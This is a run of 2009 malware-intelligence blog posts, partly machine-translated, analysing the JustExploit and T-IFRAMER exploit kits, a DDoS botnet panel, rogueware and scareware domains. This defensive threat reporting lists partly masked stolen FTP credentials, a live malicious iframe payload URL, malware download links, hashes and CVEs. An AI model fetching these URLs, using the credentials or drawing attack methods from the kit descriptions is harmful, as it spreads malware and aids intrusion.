Sunday, November 29, 2009

JustExploit. New Exploit kit that uses vulnerabilities in Java

Crimeware industry still rising, and just as illegal marketing of web applications that seek to automate the process of infection through the exploitation of vulnerabilities.

This time, the proposal called JustExploit. This is a new Exploit Pack of Russian origin who has a seasoning that is increasingly being taken into account most heavily crimeware developers: the exploitation of vulnerabilities in Java. That is, in addition to exploit known vulnerabilities for MDAC and PDF files, exploits Java in all those computers that have installed the runtime.

The catch statistics for the module (Intelligence) which clearly shows that from this application you are controlling a large number of computers using different browsers and different operating systems, among which is the famous Windows Seven.

Another interesting fact which emerges from this module is the high rate of effectiveness which has the exploitation of the vulnerability in Java, with even a greater success rate with respect to two other vulnerabilities (MDAC and PDF).

Through a file "index.php" script that has a dull, JustExploit try to run three exploits for vulnerabilities CVE-2008-2992, CVE-2009-0927 and CVE-2008-5353. Here we see part of the script.

Among the files that are downloaded, is the operator of Java, called "sdfg.jar", with a low detection rate. According to VirusTotal, only 15 of 41 antivirus engines.

In addition, the kit includes the following downloading malicious files (which for the moment, also have a very poor detection rate):
This activity is In-the-Wild relatively short time ago and is a dangerous attack vector that is actively being used by botmasters, as we have seen, with striking effectiveness.

Related information
DDoS Botnet. Nuevo crimeware de propósito particul...
T-IFRAMER. Kit para la inyección de malware In-the...
ZoPAck. Nueva alternativa para la explotación de v...
ZeuS Botnet y su poder de reclutamiento zombi
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
Mirando de cerca la estructura de Unique Sploits Pack
Adrenaline botnet: zona de comando. El crimeware ruso...
YES Exploit System. Otro crimeware made in Rusia
Barracuda Bot. Botnet activamente explotada
ElFiesta. Reclutamiento zombi a través de múltiples amenazas

Jorge Mieres
Pistus Malware Intelligence

Tuesday, November 24, 2009

Espionage by malware

During this month remember having breakfast with a piece of news for many media seem to be new or exclusively connected with some Hollywood films, giving it a connotation of "amazing." I refer to espionage through computerized means.

Then leave a screenshot of the news, in which it's evident that the malicious code are also part of the operations of intelligence in different contexts, both from a viewpoint clearly fraudulent (in the case of computer criminals) as which shields under the "flag" to protect and safeguard the interests of a State (for many intelligence services), which seek to take advantage and/or neutralize the potential actions framed within the context of hostility.

Indeed, in many cases, touching the legality of actions.

According to the information that appears in the article, the most important intelligence service of Israel (Mossad) has used a type of malicious code trojan to obtain confidential information and critiques on nuclear facilities in Syria.

The fact that Mossad used a program to spy isn't a novelty because, like its American counterpart (CIA) and many other formerly used Promis as a resource for spying.

(Someday maybe encourage me to write something about the programs used by intelligence services around the world ;P)

The point is that regardless of the impact of the news, malicious code are without doubt one of the most used for obtaining information, including at government and military, even among companies seeking to obtain confidential data that enable disclose their activities and win competition advantages.

Now, any organization or government entity may be a victim of espionage, and these activities must also be addressed by Information Security. So what can be done to counteract or neutralize these activities, which in most cases are handled on the edge of illegality, the truth isn't easy. However, implementing a strategy of misinformation can be a good practice of counterintelligence.

Ultimately it's easy to deduce that such maneuvers aren't only stock listed as "ghosts" or within the genre "science fiction" films themselves, but every day we are potential victims of the persistent attempts of malware writers seeking to break our security frameworks to obtain secret information.

Related information
Computer Intelligence, Information Security and Cyber-War
CYBINT in the business of Russian cyber-crooks

Jorge Mieres
Pistus Malware Intelligence

Monday, November 23, 2009

DDoS Botnet. New crimeware particular purpose

An attack by Denial of Service (DoS) consists basically of abuse of a service or resource by successive requests, either intentional or negligent, which eventually break the availability of such service or resource temporarily or completely.

When this type of attack is performed using the processing power of an important set of computers carrying out the abuse of requests synchronously, we are witnessing an attack Distributed Denial of Service (DDoS).

DDoS attacks aren't new at present (such as Blaster malicious code designed for this kind of attacks against Microsoft in 2003, is a classic example) and their use is a resource of any malicious activity connotation, even mafia.

In this sense, most botnets general purpose contemplated as part of its bid criminal attacks distributed denial of service by taking advantage of benefits offered by the zombies that are part of the network, and the particular purpose to perform a type specific attack against a specific target also, is typical of today.

From a perspective on cyber war, the DDoS also plays a fundamental role in the offensive mode used in this digital war also known as Cyber-Warfare, and is a resource that is part of a strategy involved in the attack analysis CYBINT (CyberIntelligence).

However, under this scenario the attack may also be used defensively in an analytical strategy to assess the constraints outlined critical services of a State.

But whatever purposes they hide behind the attack, cyber-criminals (especially those of Russian origin) constantly seek to facilitate the issue by offering crimeware developed for use exclusively with criminal minds.

The point is that a new web application for controlling botnets, is In-the-Wild, marketed in the Russian black market at a "competitive", USD 350.

The crimeware is designed to recruit and train a botnet zombies (particular purpose) intended exclusively for attacks of the type of DDoS SYN Flood, ICMP Flood, UDP, HTTP and HTTPS. In the following screenshot shows part of the configuration of the application written in PHP.

Among its outstanding features are the ability to run as a service (which is part of its defense strategy), control and administration (C&C) is done through HTTP, integration with other crimeware of his style, recording of activities (logs) with information processed on each attack (Intelligence), among many others.

I believe that research of this type of criminal activity must have the touch method that offers the activities of intelligence, as though for a home user this type of attack may matter little, not true when what is at stake are assets of the companies. As security professionals should be aware of the state of the art of crimeware, and incorporate measures of intelligence in their work.

Information related
Russian crimeware prices. Part 2
Russian Trade crimeware private versions ...
ZeuS and power Botnet zombie recruitment
Process Automation anti-analysis II
Eleonore Exploits Pack. New Crimeware In-the-Wild
Looking closely at the structure of Unique Sploits Pack
Adrenaline botnet: command area. The Russian crimeware ...
YES Exploit System. Another crimeware Made in Russia
Barracuda Bot. Botnet actively exploited
ElFiesta. Recruitment zombie across multiple threats

Jorge Mieres
Pistus Malware Intelligence Blog

Friday, November 20, 2009

Is this a Rogueware?

When looking through the MySharewareSite.com, I found the following tool and thought of finding more info about the tool.



[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]
When trying to click on the following site links:
hxxp://w w w.internetsecurity2.com/?id=avanquest_system_suite
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]
hxxp://w w w.internetsecurity2.com/shots/avanquest_system_suite.gif
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]
hxxp://w w w.internetsecurity2.com/suites/avanquest_system_suite_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

When throwing it into JSunpack we received the following response:

Sections ( CODE .rsrc )
File: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit, PECompact2 compressed
Packer: PECompact V2.X-> Bitsum Technologies,PECompact 2.xx --> BitSum Technologies,ExeShield Protector V3.6 -> www.exeshield.com,
Size: 193536 bytes,
MD5: 161f2a3e3c41dbd451021a3cc1fd2577

Based on the MD5, VirusTotal gave the following results:

LINK: http://www.virustotal.com/analisis/6bba141f45e25ea9c5cbdf910310114de7be4f97ce7572976a1b1c4c5f1ec6dc-1251400950



PrevX had a report for the same MD5:
http://info.prevx.com/aboutprogramtext.asp?PX5=48A52DBD003CF3E7F47D02C51A2AB30007864133

File size: 193536 bytes
MD5 : 161f2a3e3c41dbd451021a3cc1fd2577
SHA1 : 7fb29202fab964bcd48f1b5309021876e5175784
SHA256: 6bba141f45e25ea9c5cbdf910310114de7be4f97ce7572976a1b1c4c5f1ec6dc
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x1000
timedatestamp.....: 0x2A425E19 (Sat Jun 20 00:22:17 1992)
machinetype.......: 0x14C (Intel I386)

( 2 sections )
name viradd virsiz rawdsiz ntrpy md5
CODE 0x1000 0x80000 0x2A200 8.00 414b946f666a25e9a9ead73ea1dd1403
.rsrc 0x81000 0x5000 0x4E00 5.21 6d690ad7615832e8c76b28a3f017c377

( 11 imports )

> advapi32.dll: RegQueryValueExA
> comctl32.dll: ImageList_SetIconSize
> gdi32.dll: UnrealizeObject
> kernel32.dll: LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree
> ole32.dll: CreateStreamOnHGlobal
> oleaut32.dll: SysFreeString
> shell32.dll: ShellExecuteA
> urlmon.dll: URLDownloadToFileA
> user32.dll: GetKeyboardType
> version.dll: VerQueryValueA
> wininet.dll: DeleteUrlCacheGroup

When opening in Firefox v3.0.15, I got the following response. It is good that Firefox caught this:



Norton Safeweb gives the following results:



DIRECT LINK: http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.internetsecurity2.com%2F%3Fid%3Davanquest_system_suite&x=15&y=12

[COPIED AND PASTED FROM ABOVE REPORT, JUST IN CASE THE ABOVE LINK FAILED]
Threat Report

Total threats found: 11

Small-whitebg-red Viruses (what's this?)

Threats found: 10
Here is a complete list:
Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/avanquest_system_suite_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/trendmicro_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/registry_sweep_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/kaspersky_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Trojan Horse
Location: hxxp://www.internetsecurity2.com/suites/zonealarm_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/norton_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Suspicious.MH690
Location: hxxp://www.internetsecurity2.com/suites/registry_easy_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/panda_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Suspicious.MH690
Location: hxxp://www.internetsecurity2.com/suites/ca_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Suspicious.MH690
Location: hxxp://www.internetsecurity2.com/suites/registry_cure_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Small-whitebg-red Security Risks (what's this?)

Threats found: 1
Here is a complete list:
Threat Name: HTTP Malicious Toolkit Variant Activity
Location: hxxp://www.internetsecurity2.com/
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]
[COPIED AND PASTED FROM ABOVE REPORT, JUST IN CASE THE ABOVE LINK FAILED]

DNS Graph:



DNS Records:



DNS Analysis Report:



Conclusion:
In conclusion, the site it is being hosted on "internetsecurity2", hosts many malicious malwares as listed above. Watch out for what you download, and never think that the HASH listing is only for the geeks. All the above data, were solely derived from the MD5 generated from the EXE.

Couldn't load the EXE into Anubis, as Anubis is having heavy delay for some reason. But yeah, if you have any further analysis that you wish to share with us, that would be awesome. Contact us at contact.fingers @ gmail. com if you have any queries or concerns.


- EF

Wednesday, November 18, 2009

A recent tour of scareware XVIII

Virus Protector = AntiAID, SystemVeteran, BlockProtector, SystemWarrior
IP: 85.12.25.111, 83.233.30.66
Netherlands Netherlands Eindhoven Web10 Ict Services
Sweden Sweden Stockholm Serverconnect I Norrland
Dominios asociados
antiaid.com
blockkeeper.com
blockprotector.com
systemveteran.com
Pope Green Defender
IP: 99.198.98.217
United States United States Chicago Singlehop Inc
Dominios asociados
popegreen.com




Spyware Defender 2009
IP: 99.198.98.218
United States United States Chicago Singlehop Inc
Dominios asociados
cheelumtech.com




Pro Defender 2008
IP: 99.198.98.202
United States United States Chicago Singlehop Inc
Dominios asociados
vlachosoft.com







Proof Defender

IP: 76.76.101.85
United States United States Portland Donald Wildes
Dominios asociados
proofdefender.com
proofdefender2009.com
www.pdefender2009.com
www.proofdefender.com



techno-rescue.com (209.8.45.117) United States Herndon Beyond The Network America
besttoolsdirect.com (193.169.234.3) Jamaica Jamaica Titan-net Ltd
rfastnet.com/online (213.155.22.193) Ukraine Ukraine Kiev Singhajeet3 - Singh Ajeet
advanced-virus-remover2010.com (91.207.116.55) Ukraine Ukraine Czech Republic Of Rays
10-open-davinci.com
advanced-virus-remover2010.com
advanced-virusremover-2009.com
advanced-virusremover2009.com
advancedvirus-remover-2010.com
advancedvirusremover-2009.com
best-scan-pc.com
best-scan-pc.net
best-scan.com
best-scanpc.com
best-scanpc.net
best-scanpc.org
cathrynzfunz.com
coolcount1.com
downloadavr6.com
downloadavr7.com
downloadavr8.com
hard-xxx-tube.com
testavrdown.com
testavrdownnew.com
vsproject.net
www.advanced-virus-remover-2009.com
www.advancedvirus-remover2009.com
www.advancedvirusremover-2009.com
www.best-scan-pc.com
www.best-scanpc.net
www.best-scanpc.org
www.hard-xxx-tube.com
www.onlinescanxppro.com
xxx-white-tube.net
xxx-white-tube.org
argentmarketingtools.com (194.60.205.20) Russian Federation Russian Federation Baltic Center Of Innovations Techprominvest Ltd
thetoolsbargain.com, bestalltools.com (62.90.136.210) Israel Israel Haifa Loads

Información relacionada
Una recorrida por los últimos scareware XVII
Una recorrida por los últimos scareware XVI
Una recorrida por los últimos scareware XV
Una recorrida por los últimos scareware XIV
Una recorrida por los últimos scareware XIII
Una recorrida por los últimos scareware XII
Una recorrida por los últimos scareware XI
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware I

Jorge Mieres
Pistus Malware Intelligence Blog

Sunday, November 15, 2009

T-IFRAMER. Kit for the injection of malware In-the-Wild

T-IFRAMER is a package that allows you to automate, centralize and manage via http the spread of malicious code via code injection sites violated viral techniques using iframe, and feed a botnet. We then see a screen capture of authentication.

While there is a complex kit allows computer criminals manage the spread of malware via the http protocol type attacks using Drive-by-Download and Drive-by-Injection by inserting iframe tags in web pages violated.

The four key modules: Stats, Manager, Iframes and Injector, and each has the main function to optimize the spread of malware.

The first one (Stats) to manage FTP accounts violated having control over them with the ability to upload files. Thus begins one of the cycles of propagation of malicious code.

The management module has several categories, among which are:
  • Iframe accounts. These are pages that have been injected malicious scripts through the iframe tag.
  • Not Iframe. FTP accounts are basically violated. In this case, stored until several ftp accounts:
ftp://distribs:softXP @ 193.xxx.xxx.66
ftp://distribs:softXP @ 193.xxx.xxx.66

ftp://tools:softXP @ 193.xxx.xxx.66
ftp://tools : softXP@193.xxx.xxx.66

ftp://tools:softXP @ 193.xxx.xxx.66

ftp://distribs:softXP @ 193.xxx.xxx.66

ftp://NST:124 @ 80. xxx.xxx.179
ftp://NST:124 @ 80.xxx.xxx.179

ftp://NST:124 @ 80.xxx.xxx.179

ftp://NST:124 @ 80.xxx.xxx.179

  • Good accounts. Allows you to set which violated ftp accounts are useful or are still active.
  • Freehosts accounts. It lists all the ftp violated websites that are hosted on free hosting.
  • Unchecked accounts. Accounts that haven't yet been reviewed.
The following screenshots show two of the ftp violated. In each of these can store any kind of information (warez, cracks, pornography, phishing, pedophile material, any type of malware). The first software houses and the second is a mirror to download * NIX based distributions.



Module Manager is itself a panel that allows the administration of each of the above categories, including the ability to directly remove the FTP record.

To this end, these first modules are concerned with everything related to the management of accounts. However, it doesn't end with these and the following modules are more aggressive.

One is the form Iframes. This allows you to set the strategy of attack through iframe tags, hiding it (as usual) in a script. In this case, the script has used as the url information http://flo4.cn/1.txt.

In turn, this url contains reference to another url, but in this case, contains a rough script that contains multiple exploits and malware automatically downloaded.

In this instance, after trying to run the exploit, it redirects the domain http://www.google.ru, which seems manipulates the return of the searches.

Exploits that have are the following:
Malicious code that are downloaded are:
  • ehkruz1.exe. This is a Trojan designed to capture information related to the service WebMoney and to date has a low rate of detection, antivirus detected only 6 engines of 41. The filename is random.
  • egiz.pdf. Contains exploit (CVE-2007-5659, CVE-2008-2992 and CVE-2009-0927) with a low detection rate, 7 / 41 (17.08%). Download the binary.
  • manual.swf. Contains exploit. Its detection rate is medium-low, 15/41 (36.59%).
  • sdfg.jar. Troyan is a downloader with exploit. Its detection rate is meda-low, 14/41 (34.15%).
  • ghknpxds.jpg. It contains an exploit. Its detection rate is very low, 4 / 41 (9.76%).
The module Injector is responsible for the actions iframe code injection through the module created earlier, letting you configure a number of parameters to optimize attack, for example, allows you to control PageRank, inject code, clean it if necessary, check the country's hosting and ftp accounts, establish which domains attack (1st and 2nd level, both configurable), configure regular expressions with the names of folders and files common to find in a web server, among others.

Investigating a little more domains involved, obvious that this application is being used as a tool of "support" for a known crimeware and of which we have spoken on this blog, this is the latest Fragus.

That is, the domain "hidden" between the labels iframe redirects to a new URL from which to exploit a battery of artillery trying to achieve with its potentially vulnerable computers, and download the malware responsible for recruiting the zombie.

T-IFRAMER has two distinct groups. On one hand the administration and on the other the attack in addition to obviously continue to fuel the botnet, with which it's clear that those behind this type of crimeware really know what they want and, although the development of the application is very simple, is effective enough to be used by a des botnets more effective today as it's fragus.

Finally, these actions are very similar to those performed by Gumblar (who according to some sources would be of Chinese origin, though I doubt it), and although I can not say that in this case concerned the mechanisms for disseminating Gumblar, especially because in the first instance this kit is of Russian origin (as fragus), there is no doubt that the strategy (together) is very similar.

I
s it what many call today Gumble?

Related information
Fragus. New botnet framework In-the-Wild
ZoPAck. New alternative for the exploitation of v. ..
ZeuS and power Botnet zombie recruitment
DDBot. More Botnets management via web
Phoenix Exploit's Kit Another alternative for controlling botnets
INF `[LOADER]. Control of botnets, malware and spread (...)
Liberty Exploit System. (...) Another alternative for controlling botnets
Eleonore Exploits Pack. New Crimeware In-the-Wild
Russian crimeware prices. Part 2

Jorge Mieres
Pistus Malware Intelligence Blog